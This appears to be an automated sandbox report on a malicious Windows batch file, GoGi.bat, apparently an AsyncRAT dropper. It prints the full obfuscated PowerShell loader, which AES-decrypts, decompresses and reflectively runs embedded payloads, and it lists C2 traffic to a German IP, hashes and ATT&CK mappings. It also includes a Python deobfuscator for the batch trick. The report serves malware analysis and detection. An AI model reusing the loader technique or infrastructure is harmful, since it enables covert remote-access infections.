Windows
Analysis Report
GoGi.bat
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- cmd.exe (PID: 6740 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\GoGi.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 6936 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\GoGi.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7052 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- powershell.exe (PID: 7132 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
- powershell.exe (PID: 4296 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
System Summary |
---|
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) |
Timestamp: | 04/20/24-10:18:04.027368 |
SID: | 2850454 |
Source Port: | 4449 |
Destination Port: | 49730 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
AV Detection | Occurrences |
---|---|
URL Reputation | 1 |
Binary string | 19 |
Networking | Occurrences |
---|---|
Snort IDS | 1 |
TCP traffic | 1 |
ASN Name | 1 |
TCP traffic detected without corresponding DNS query | 50 |
String found in binary or memory | 15 |
System Summary | Occurrences |
---|---|
Process created | 2 |
Code function (6_2_00007FFD9B8A6E20, 6_2_00007FFD9B8BDCA0, 6_2_00007FFD9B8A63C8, 6_2_00007FFD9B8AC93B, 6_2_00007FFD9B8AF8D8, 6_2_00007FFD9B8A0E32, 6_2_00007FFD9B8AF4CF) | 7 |
Classification label | 1 |
File created | 1 |
Mutant created | 4 |
File created | 1 |
Process created | 1 |
WMI Queries | 1 |
Key opened | 1 |
Process created | 11 |
Section loaded | 84 |
Window detected | 1 |
File opened | 1 |
Binary string | 19 |
Data Obfuscation | Occurrences |
---|---|
Process created | 2 |
Code function (6_2_00007FFD9B8B095E, 6_2_00007FFD9B8A796A, 6_2_00007FFD9B8A786D, 6_2_00007FFD9B8A785D) | 4 |
Process information set | 188 |
Malware Analysis System Evasion | Occurrences |
---|---|
WMI Queries | 1 |
Thread delayed | 3 |
Window / User API | 4 |
Thread sleep count | 2 |
Thread sleep time | 1 |
Thread sleep count | 2 |
Thread sleep time | 2 |
WMI Queries | 2 |
Last function | 1 |
File Volume queried | 1 |
Thread delayed | 3 |
Process information queried | 1 |
Process queried | 1 |
Process token adjusted | 2 |
Process created | 6 |
Queries volume information | 35 |
WMI Queries | 1 |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 131 Windows Management Instrumentation | 1 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 14 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 11 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 151 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 151 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 23 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
 | 8% | ReversingLabs | | |
 | 5% | Virustotal | | |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
 | 0% | Virustotal | | |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
 | 100% | URL Reputation | malware | |
 | 0% | URL Reputation | safe | |
 | 0% | URL Reputation | safe | |
 | 0% | URL Reputation | safe | |
 | 0% | URL Reputation | safe | |
 | 0% | URL Reputation | safe | |
 | 0% | URL Reputation | safe | |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
 | | false | | high |
 | | false | | high |
 | | true | | unknown |
 | | false | | high |
 | | false | | unknown |
 | | false | | unknown |
 | | false | | high |
 | | false | | unknown |
 | | false | | unknown |
 | | false | | unknown |
 | | false | | high |
 | | false | | high |
 | | false | | high |
 | | false | | unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.222.96.114 | unknown | Germany | | 3303 | SWISSCOM Swisscom (Switzerland) Ltd, CH | true |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1429040 |
Start date and time: | 2024-04-20 10:17:05 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 7m 1s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 12 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | GoGi.bat |
Detection: | MAL |
Classification: | mal68.evad.winBAT@11/10@0/1 |
EGA Information: | |
HCA Information: | |
Cookbook Comments: | |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 23.47.204.74, 23.47.204.72, 23.47.204.46, 23.47.204.58
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
- Not all processes were analyzed; the report is missing behavior information
Time | Type | Description |
---|---|---|
10:17:56 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
bg.microsoft.map.fastly.net | | Get hash | malicious | Quasar | Browse | |
 | | Get hash | malicious | AgentTesla, PureLog Stealer, zgRAT | Browse | |
 | | Get hash | malicious | Unknown | Browse | |
 | | Get hash | malicious | PayPal Phisher | Browse | |
 | | Get hash | malicious | Unknown | Browse | |
 | | Get hash | malicious | TechSupportScam | Browse | |
 | | Get hash | malicious | TechSupportScam | Browse | |
 | | Get hash | malicious | TechSupportScam | Browse | |
 | | Get hash | malicious | TechSupportScam | Browse | |
 | | Get hash | malicious | TechSupportScam | Browse | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
SWISSCOM Swisscom (Switzerland) Ltd, CH | | Get hash | malicious | Unknown | Browse | |
 | | Get hash | malicious | AgentTesla, PureLog Stealer, zgRAT | Browse | |
 | | Get hash | malicious | HTMLPhisher | Browse | |
 | | Get hash | malicious | GuLoader, Remcos | Browse | |
 | | Get hash | malicious | GuLoader, Remcos | Browse | |
 | | Get hash | malicious | GuLoader, Remcos | Browse | |
 | | Get hash | malicious | Mirai | Browse | |
 | | Get hash | malicious | GuLoader, Remcos | Browse | |
 | | Get hash | malicious | HTMLPhisher | Browse | |
 | | Get hash | malicious | Mirai | Browse | |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 69993 |
Entropy (8bit): | 7.99584879649948 |
Encrypted: | true |
SSDEEP: | 1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr |
MD5: | 29F65BA8E88C063813CC50A4EA544E93 |
SHA1: | 05A7040D5C127E68C25D81CC51271FFB8BEF3568 |
SHA-256: | 1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184 |
SHA-512: | E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 3.1475546137593846 |
Encrypted: | false |
SSDEEP: | 6:kKZYlDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:6lMkPlE99SNxAhUeVLVt |
MD5: | 690C13DB3A1B943B8692E4C6D1966A5D |
SHA1: | B1275A0B1440232E8BED13A0BB51C7FBA2AF9809 |
SHA-256: | 36B03E949625C785558661A1AB38B9F0BE88F5DEF6068255623C16E73F1D621F |
SHA-512: | EAF48AD1AA817180FFE3DA248F5551251DCB53EF5D3A7E99278537AFF30E6FD1AAC8B7B7CC85CE8C072838DA59480F145BAE1D6DA605AE838704345D80E86F7F |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 9713 |
Entropy (8bit): | 4.93568648418653 |
Encrypted: | false |
SSDEEP: | 192:Pxoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smwY1D:lVib49Vkjh4iUxlYvcYKib4o |
MD5: | A7EDDF0DCC37957ABAFE63CE6D0BE4CA |
SHA1: | 5B09680EF1C3C405D698481E1364BE0C412C7A9C |
SHA-256: | B9F314DC6C4DDB176CB92C77ECB5FCA91FB58FBE12DCFD9CEB4E8BFFC07B5327 |
SHA-512: | A906C8FFAB88AD0CEAD9A5B4D7D4089C1621A8D36F7190EF6FD829B0D942BBBC89E76424C46E204282B6985C02ABD3488082A6A2A4D88CDE396C480E2989AF73 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2832 |
Entropy (8bit): | 5.414030276061799 |
Encrypted: | false |
SSDEEP: | 48:0AzsSU4YymI4RIoUeCa+m9qr9t5/78NV4GxJZKaVEouYAgwd64rHLjtvz:0AzlHYvIIfLz9qrh7KrJ5Eo9Adrxz |
MD5: | BAF5A10C59FD93E444E5B672D7CCB1D4 |
SHA1: | 906BB875AB47D641756F44E09633F75AFDDDD638 |
SHA-256: | B029CB8CEA8D97BF6F636D2BE3F7A0F3334A07E22B832581A3D1D1F282AFC637 |
SHA-512: | B52A2F66B83271814381F897CD32B83ED97F18553EEDB8DDABE99B93EAF58C46A362E6255B0744C41C5E91042238E15ED9E4CF46C11446937B850F104965087A |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8 |
Entropy (8bit): | 2.75 |
Encrypted: | false |
SSDEEP: | 3:Rt:v |
MD5: | CF759E4C5F14FE3EEC41B87ED756CEA8 |
SHA1: | C27C796BB3C2FAC929359563676F4BA1FFADA1F5 |
SHA-256: | C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761 |
SHA-512: | C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2139 |
Entropy (8bit): | 5.7781485718880985 |
Encrypted: | false |
SSDEEP: | 48:O2onXBS0NmhNrdR2Rd2Rxf8BmBYFSznk/kBJn3rGcTJsGcmtKWz:O5xSPh5dg+7f8BmBYFSzFx36cdHcmz |
MD5: | 39D538F12866D931EF35929072C94ED2 |
SHA1: | 2A93488CA62A6F0F5F3570D6784BF7D570D598EC |
SHA-256: | 85536DA18EA005ADF721A739D6D07FBB2AD39AE3423ECD79F7D3CD58EB4F10E9 |
SHA-512: | D5FA366B516C111693E6FDAE02E1A43CCF9B01CE138E1836D04D949DA2986A7AC948B5BDACE548F298276D5264946C60FCE9136183D1A6DFF1F9E2E94FA1B58A |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 5.999975112908781 |
TrID: | |
File name: | GoGi.bat |
File size: | 62'296 bytes |
MD5: | cab2108a81d68104dd9b15efcedf8351 |
SHA1: | 03852c18f75cad87f71693fb1973d9a04e8910ed |
SHA256: | a2dfe970dc385f9aa1a81946c4bc41144d182dbddb02e37ce4c5b52c9b884aaa |
SHA512: | e474ce03766f8e21fdb14e072144e8e1c5fa1f30e66ea4f7a05fade86bd783fb4dec65d23ab01861524959a0a029cb2112074116fdbd72d02ab4794216ed95f5 |
SSDEEP: | 1536:ts4yFTt4kNLNofpmw3dU7pVcJqmJQBULYJebJaRVmMWVXUpQk8daktj2aVv0+x/:tITGkDofH27pAD8YdYFpQk88kd2aJ/x/ |
TLSH: | 4653E0B15E3D7ADB73CA53E08E7CBE95CC40316E6AC1129B1BC43A284A9CF499E0F051 |
File Content Preview: | @echo off..set "tPxaUE=setztepY sjztepYCJztepY=1ztepY &ztepY& ztepYsztepYtaztepYrt ztepY"ztepY" /ztepYmztepYinztepY ztepY"..set "JHuzvA=&& ztepYexiztepYtztepY"..set "sWWmDL=nztepYotztepY dztepYefiztepYneztepYd ztepYsjztepYCJztepY..if %sWWmDL:ztepY=% (%tPx |
Icon Hash: | 9686878b929a9886 |
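The File Content Preview above shows the batch-level obfuscation in GoGi.bat: each command fragment is stored in a `set` variable with a junk token (`ztepY`) spliced into it, and cmd's `%VAR:needle=replacement%` substring substitution strips the token again at expansion time, so static string scanning of the file never sees `start`, `exit` or `not defined`. The following is an added example, not code from the Joe Sandbox report or from the sample, of a small expander for that pattern. The three `set` lines are copied from the preview; the preview cuts the `if` line off after `(%tPx`, so its tail (a `"%~f0"` self-relaunch argument and the `%JHuzvA:ztepY=%` expansion) is an assumption made here only so that the constructed sample is complete.

```python
import re

# Constructed sample modelled on the report's "File Content Preview". The three `set` lines are
# copied from the preview; the `if` line is truncated there, so everything after `(%tPxaUE:ztepY=%`
# is an ASSUMPTION added for this example and is not taken from the actual file.
SAMPLE = '''@echo off
set "tPxaUE=setztepY sjztepYCJztepY=1ztepY &ztepY& ztepYsztepYtaztepYrt ztepY"ztepY" /ztepYmztepYinztepY ztepY"
set "JHuzvA=&& ztepYexiztepYtztepY"
set "sWWmDL=nztepYotztepY dztepYefiztepYneztepYd ztepYsjztepYCJztepY"
if %sWWmDL:ztepY=% (%tPxaUE:ztepY=%"%~f0" %JHuzvA:ztepY=%)
'''

# set "NAME=VALUE"  (the quoted form used by the sample; the closing quote is the last one on the line)
SET_RE = re.compile(r'^\s*set\s+"([A-Za-z_][A-Za-z0-9_]*)=(.*)"\s*$', re.IGNORECASE)
# %NAME%  or  %NAME:needle=replacement%  (cmd substring substitution). %~f0-style argument
# expansions never match because '~' is not a valid first character of a variable name.
EXPAND_RE = re.compile(r'%([A-Za-z_][A-Za-z0-9_]*)(?::([^=%]+)=([^%]*))?%')


def parse_sets(script):
    """Collect `set "NAME=VALUE"` assignments; cmd variable names are case-insensitive."""
    env = {}
    for line in script.splitlines():
        m = SET_RE.match(line)
        if m:
            env[m.group(1).lower()] = m.group(2)
    return env


def substitute(value, needle, repl):
    """Emulate %VAR:needle=repl%: case-insensitive replace-all. A leading '*' in the needle
    replaces everything up to and including the first occurrence instead."""
    if needle.startswith('*'):
        idx = value.lower().find(needle[1:].lower())
        return value if idx < 0 else repl + value[idx + len(needle) - 1:]
    return re.sub(re.escape(needle), lambda _m: repl, value, flags=re.IGNORECASE)


def expand(text, env, max_rounds=10):
    """Expand %VAR% references until the text stops changing, so layered obfuscation
    (variables whose values contain further %VAR% references) is resolved too.
    Undefined names expand to the empty string, as they do inside a batch file."""
    def repl(m):
        name, needle, rep = m.group(1).lower(), m.group(2), m.group(3)
        if name not in env:
            return ''
        return substitute(env[name], needle, rep) if needle is not None else env[name]

    for _ in range(max_rounds):
        new = EXPAND_RE.sub(repl, text)
        if new == text:
            break
        text = new
    return text


def deobfuscate(script):
    """Drop the decoy `set` lines and return only the lines that execute, fully expanded."""
    env = parse_sets(script)
    out = [expand(line, env) for line in script.splitlines() if not SET_RE.match(line)]
    return '\n'.join(out)


if __name__ == '__main__':
    print(deobfuscate(SAMPLE))
```

On the constructed sample this yields `if not defined sjCJ (set sjCJ=1 && start "" /min "%~f0" && exit)`, the usual "relaunch myself minimised, then exit the visible console" prologue; the `sjCJ` guard variable stops the relaunch from recursing. The expander only handles the quoted `set` form and the `needle=replacement` substitution that this sample uses; `%VAR:~start,len%` substring slicing and delayed (`!VAR!`) expansion are not implemented.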
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/20/24-10:18:04.027368 | TCP | 2850454 | ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT) | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 20, 2024 10:18:03.615164995 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:03.814419031 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:03.814536095 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:03.821696043 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:04.027368069 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:04.033051014 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:04.234569073 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:04.275921106 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:05.163355112 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:05.408771992 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:05.408855915 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:05.658771038 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:19.871148109 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:20.112046957 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:20.112257957 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:20.312922001 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:20.353951931 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:20.553388119 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:20.563235044 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:20.815227032 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:20.815350056 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:21.065100908 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:34.588754892 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:34.830734968 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:34.830935955 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:35.031852961 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:35.072849989 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:35.272197008 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:35.275706053 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:35.518089056 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:35.518371105 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:35.768213034 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:49.307337999 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:49.549393892 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:49.549500942 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:49.749908924 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:49.791435957 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:49.990715027 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:49.992552996 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:50.236711025 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:18:50.236802101 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:18:50.486635923 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:04.026103973 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
